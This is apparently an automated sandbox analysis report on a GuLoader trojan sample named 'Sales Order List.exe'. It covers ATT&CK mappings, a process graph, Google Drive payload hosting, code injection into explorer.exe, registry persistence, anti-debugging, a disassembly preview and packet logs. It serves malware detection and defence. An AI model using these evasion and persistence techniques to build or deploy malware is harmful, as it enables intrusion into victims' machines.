                Source: Yara matchFile source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationRegistry Run Keys / Startup Folder1Process Injection312Masquerading3Input Capture21Query Registry1Remote ServicesInput Capture21Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
                Default AccountsScheduled Task/JobDLL Side-Loading1Registry Run Keys / Startup Folder1Modify Registry1LSASS MemorySecurity Software Discovery431Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion23Security Account ManagerVirtualization/Sandbox Evasion23SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection312NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsSystem Information Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Users1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend


                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 526595 Sample: Sales Order List.exe Startdate: 22/11/2021 Architecture: WINDOWS Score: 100 39 googlehosted.l.googleusercontent.com 2->39 41 drive.google.com 2->41 43 doc-0k-48-docs.googleusercontent.com 2->43 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 8 other signatures 2->61 9 Sales Order List.exe 1 2->9         started        signatures3 process4 signatures5 63 Tries to detect Any.run 9->63 65 Hides threads from debuggers 9->65 12 Sales Order List.exe 4 11 9->12         started        process6 dnsIp7 49 googlehosted.l.googleusercontent.com, 443, 49807 GOOGLEUS United States 12->49 51 drive.google.com, 443, 49806 GOOGLEUS United States 12->51 35 C:\ProgramData\images.exe, PE32 12->35 dropped 37 C:\ProgramData\images.exe:Zone.Identifier, ASCII 12->37 dropped 67 Injects code into the Windows Explorer (explorer.exe) 12->67 69 Writes to foreign memory regions 12->69 71 Allocates memory in foreign processes 12->71 73 4 other signatures 12->73 17 images.exe 1 12->17         started        20 cmd.exe 1 12->20         started        22 explorer.exe 12->22 injected file8 signatures9 process10 dnsIp11 53 Multi AV Scanner detection for dropped file 17->53 25 WerFault.exe 21 16 17->25         started        28 WerFault.exe 16 17->28         started        30 reg.exe 1 1 20->30         started        33 conhost.exe 20->33         started        45, 49774, 49787, 80 EDGECASTUS European Union 22->45 signatures12 process13 dnsIp14 47 unknown unknown 25->47 75 Creates an undocumented autostart registry key 30->75 signatures15



                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Sales Order List.exe40%ReversingLabsWin32.Trojan.GuLoader

                Dropped Files


                Unpacked PE Files

                4.3.Sales Order List.exe.18f3e10.7.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                4.3.Sales Order List.exe.18f3e10.3.unpack100%AviraTR/Crypt.XPACK.Gen2Download File


                No Antivirus matches


                https://outlook.comows.CB0%Avira URL Cloudsafe
                https://excel.office.comn0%Avira URL Cloudsafe
                https://powerpoint.office.com80%Avira URL Cloudsafe
                http://schemas.micro0%Avira URL Cloudsafe
                http://www.topqualityfreeware.com/0%Avira URL Cloudsafe
                https://watson.telemet0%Avira URL Cloudsafe
                http://topqualityfreeware.com0%Avira URL Cloudsafe
                https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmpfalse
                          https://word.office.comexplorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmpfalse
                            https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                              https://outlook.comows.CBexplorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              https://drive.google.com/4Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmpfalse
                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                                  https://doc-0k-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5iSales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmpfalse
                                    https://excel.office.comnexplorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEMexplorer.exe, 0000000B.00000002.130415876105.0000000010478000.00000004.00000001.sdmpfalse
                                        https://doc-0k-48-docs.googleusercontent.com/Sales Order List.exefalse
                                          https://powerpoint.office.com8explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                            https://excel.office.comexplorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmpfalse
                                              http://www.foreca.comexplorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                                                http://schemas.microexplorer.exe, 0000000B.00000000.125786547597.000000000A940000.00000002.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.comSales Order List.exe, 00000004.00000003.125871810697.0000000001879000.00000004.00000001.sdmpfalse
                                                  https://www.msn.com/de-ch/?ocid=iehpUexplorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmpfalse
                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                                                      https://doc-0k-48-docs.googleusercontent.com/7Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmpfalse
                                                        https://doc-0k-48-docs.googleusercontent.com/wSales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmpfalse
                                                          https://www.msn.com/?ocid=iehpexplorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmpfalse
                                                            https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                                                              http://www.topqualityfreeware.com/Sales Order List.exefalse
                                                              • Avira URL Cloud: safe
                                                              https://drive.google.com/Sales Order List.exe, 00000004.00000003.125871692204.0000000001870000.00000004.00000001.sdmpfalse
                                                                https://android.notify.windows.com/iOSexplorer.exe, 0000000B.00000002.130409357270.000000000CEEE000.00000004.00000001.sdmpfalse
                                                                  https://doc-0k-48-docs.googleusercontent.com/S~Sales Order List.exe, 00000004.00000003.125871877283.0000000001883000.00000004.00000001.sdmpfalse
                                                                    https://api.msn.com:443/v1/news/Feed/Windows?Pexplorer.exe, 0000000B.00000000.125782425758.00000000093FE000.00000004.00000001.sdmpfalse
                                                                      https://doc-0k-48-docs.googleusercontent.com/3Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmpfalse
                                                                        https://watson.telemetWerFault.exe, 00000014.00000003.125950197304.0000000002D61000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        https://www.msn.com/de-ch/?ocid=iehpexplorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmpfalse
                                                                          https://api.msn.com/explorer.exe, 0000000B.00000000.125824045068.0000000002E1A000.00000004.00000001.sdmpfalse
                                                                            https://wns.windows.com/explorer.exe, 0000000B.00000002.130416256186.00000000104AE000.00000004.00000001.sdmpfalse
                                                                              http://topqualityfreeware.comSales Order List.exefalse
                                                                              • Avira URL Cloud: safe
                                                                              https://windows.msn.com:443/shellexplorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                                                                                https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGaexplorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                                                                                  https://github.com/syohex/java-simple-mine-sweeperC:Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmpfalse
                                                                                    https://www.msn.com/?ocid=iehpAexplorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmpfalse
                                                                                      https://www.msn.com:443/en-us/feedexplorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                                                                                        https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpfalse
                                                                                          https://aka.ms/odirmeexplorer.exe, 0000000B.00000000.125824449017.0000000002E75000.00000004.00000001.sdmpfalse
                                                                                            https://csp.withgoogle.com/csp/report-to/gse_l9ocaqSales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe

                                                                                            Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs


                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            drive.google.comUnited States
                                                                                            googlehosted.l.googleusercontent.comUnited States
                                                                                            unknownEuropean Union



                                                                                            General Information

                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                            Analysis ID:526595
                                                                                            Start date:22.11.2021
                                                                                            Start time:19:37:50
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 13m 33s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:light
                                                                                            Sample file name:Sales Order List.exe
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                            Run name:Suspected Instruction Hammering
                                                                                            Number of analysed new started processes analysed:24
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:1
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            EGA Information:Failed
                                                                                            HDC Information:Failed
                                                                                            HCA Information:Failed
                                                                                            Cookbook Comments:
                                                                                            • Adjust boot time
                                                                                            • Enable AMSI
                                                                                            • Found application associated with file extension: .exe
                                                                                            Show All
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
                                                                                            • TCP Packets have been reduced to 100
                                                                                            • Excluded IPs from analysis (whitelisted):,,,
                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, umwatson.events.data.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.


                                                                                            Behavior and APIs

                                                                                            19:40:43API Interceptor2x Sleep call for process: WerFault.exe modified

                                                                                            Joe Sandbox View / Context


                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            • /
                                                                                            SecuredFolder.htmGet hashmaliciousBrowse
                                                                                            • status.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQnt%2BO7KdI35ubyUVwz39VP7XeuiQQU5wH8DBYYyn2yjOyHJ6NvYYE7hDkCEAghIHE0ISqj0Gwb1T5M8Uc%3D


                                                                                            No context


                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            EDGECASTUSLamontagnem.htmlGet hashmaliciousBrowse
                                                                                            EFT-11-22-201.htmlGet hashmaliciousBrowse
                                                                                            Renee.schneider.htmlGet hashmaliciousBrowse
                                                                                            Renee.schneider.htmlGet hashmaliciousBrowse
                                                                                            Renee.schneider.htmlGet hashmaliciousBrowse
                                                                                            AP_Remittance_SWT130003815_0.htmlGet hashmaliciousBrowse
                                                                                            N64GUd01yFGet hashmaliciousBrowse
                                                                                            wnRWWNwExD.exeGet hashmaliciousBrowse
                                                                                            eFax document 805428.htmlGet hashmaliciousBrowse
                                                                                            eFax document 805428.htmlGet hashmaliciousBrowse
                                                                                            Customercare.htmlGet hashmaliciousBrowse
                                                                                            VM30368688117.htmGet hashmaliciousBrowse
                                                                                            Tekst.exeGet hashmaliciousBrowse
                                                                                            voice9CT8-QJXF1Y-OWY9-6538-878.htmlGet hashmaliciousBrowse
                                                                                            in27996.htmlGet hashmaliciousBrowse
                                                                                            SANDBOXME.HTMGet hashmaliciousBrowse
                                                                                            #LYTNXI.HTMGet hashmaliciousBrowse
                                                                                            rfq.exeGet hashmaliciousBrowse
                                                                                            cbenson@palliser.com.htmGet hashmaliciousBrowse
                                                                                            atlanticare.org-Payslip-Details-691256-pdf.htmGet hashmaliciousBrowse

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            37f463bf4616ecd445d4a1937da06e19EVhIUVrKx8.exeGet hashmaliciousBrowse
                                                                                            #U0191ACTU#U0156A_gudqNItO_54357.vbsGet hashmaliciousBrowse
                                                                                            pix2021.TZNZPOYJNN.msiGet hashmaliciousBrowse
                                                                                            T1SN5sRQjf.exeGet hashmaliciousBrowse
                                                                                            Lamontagnem.htmlGet hashmaliciousBrowse
                                                                                            EFT-11-22-201.htmlGet hashmaliciousBrowse
                                                                                            aBGNeDS7yM.exeGet hashmaliciousBrowse
                                                                                            aBGNeDS7yM.exeGet hashmaliciousBrowse
                                                                                            ATT00001.htmGet hashmaliciousBrowse
                                                                                            Renee.schneider.htmlGet hashmaliciousBrowse
                                                                                            REF ID 398046279094.htmlGet hashmaliciousBrowse
                                                                                            Chrome.Update.5947c2.jsGet hashmaliciousBrowse
                                                                                            Chrome.Update.5947c2.jsGet hashmaliciousBrowse
                                                                                            2GirCpksIO.exeGet hashmaliciousBrowse
                                                                                            HP7DYSoP6M.exeGet hashmaliciousBrowse
                                                                                            yRqB5VANT3.exeGet hashmaliciousBrowse
                                                                                            n#U00ba410000512664.exeGet hashmaliciousBrowse
                                                                                            1Fu7t9XR6E.exeGet hashmaliciousBrowse
                                                                                            justificante de la transfer.exeGet hashmaliciousBrowse
                                                                                            justificante de la transfer.exeGet hashmaliciousBrowse

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):0.8478396170633179
                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.!.
                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):0.848572589416445
                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.!.
                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 22 19:40:39 2021, 0x1205a4 type
                                                                                            Size (bytes):49428
                                                                                            Entropy (8bit):2.2764484756070344
                                                                                            Preview: MDMP..a..... .......7.a....................................$...8+..........T.......8...........T...........H..........................................................................................................bJ..............GenuineIntel...........T.......`...1.a.............................0..2...............G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................
                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Size (bytes):6312
                                                                                            Entropy (8bit):3.716692772422422
                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.<./.P.i.
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Size (bytes):4815
                                                                                            Entropy (8bit):4.497462564893132
                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221365342" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Nov 22 19:40:49 2021, 0x1205a4 type
                                                                                            Size (bytes):46432
                                                                                            Entropy (8bit):2.2247663829786646
                                                                                            Preview: MDMP..a..... .......A.a........................................8+..........T.......8...........T...............h.......................................................................................................bJ..............GenuineIntel...........T.......`...1.a.............................0..2...............G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................
                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                            Size (bytes):6318
                                                                                            Entropy (8bit):3.71965123962902
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                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L.....G.................0..........L........@....@.........................................................................;..(....`......................................................................0... ....................................text...l/.......0.................. ..`.data........@.......@..............@....rsrc........`.......P..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
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                                                                                            Static File Info


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                                                                                            File name:Sales Order List.exe
                                                                                            File size:192512
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......G.................0..........L........@....@........

                                                                                            File Icon

                                                                                            Icon Hash:0ceefedec6f67c0c

                                                                                            Static PE Info


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                                                                                            Entrypoint Preview

                                                                                            push 00407ED4h
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                                                                                            add byte ptr [eax], al
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                                                                                            add byte ptr [eax], al
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                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [ecx], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax+72h], dh
                                                                                            jc 00007F939CCA59CFh
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                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
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                                                                                            enter 431Fh, A9h
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                                                                                            jl 00007F939CCA5951h
                                                                                            jno 00007F939CCA58F2h
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                                                                                            and dword ptr [edi], esi
                                                                                            push ds
                                                                                            xchg eax, ebp
                                                                                            pop edx
                                                                                            dec esi
                                                                                            xor dword ptr [edx+esi*8-7E5EB600h], 7Eh
                                                                                            cmp cl, byte ptr [edi-53h]
                                                                                            xor ebx, dword ptr [ecx-48EE309Ah]
                                                                                            or al, 00h
                                                                                            add byte ptr [eax-2Dh], ah
                                                                                            xchg eax, ebx
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
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                                                                                            add byte ptr [ebp+00000068h], bl
                                                                                            or byte ptr [eax], al
                                                                                            jne 00007F939CCA59D0h
                                                                                            je 00007F939CCA59C3h
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                                                                                            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaVar2Vec, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                                            Version Infos

                                                                                            Translation0x0442 0x04b0

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 22, 2021 19:40:21.012541056 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.012623072 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.012769938 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.029973984 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.030036926 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.084928989 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.085134029 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.085199118 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.088140011 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.088325024 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.212809086 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.212899923 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.213602066 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.213736057 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.216972113 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.260008097 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.642613888 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.642795086 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.642851114 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.643023968 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.643069983 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.643183947 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.643234015 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.643399954 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.643449068 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.643495083 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.643560886 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.643696070 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.648004055 CET49806443192.168.11.20142.250.186.46
                                                                                            Nov 22, 2021 19:40:21.648104906 CET44349806142.250.186.46192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.736989975 CET49807443192.168.11.20142.250.185.161
                                                                                            Nov 22, 2021 19:40:21.737066031 CET44349807142.250.185.161192.168.11.20
                                                                                            Nov 22, 2021 19:40:21.737317085 CET49807443192.168.11.20142.250.185.161
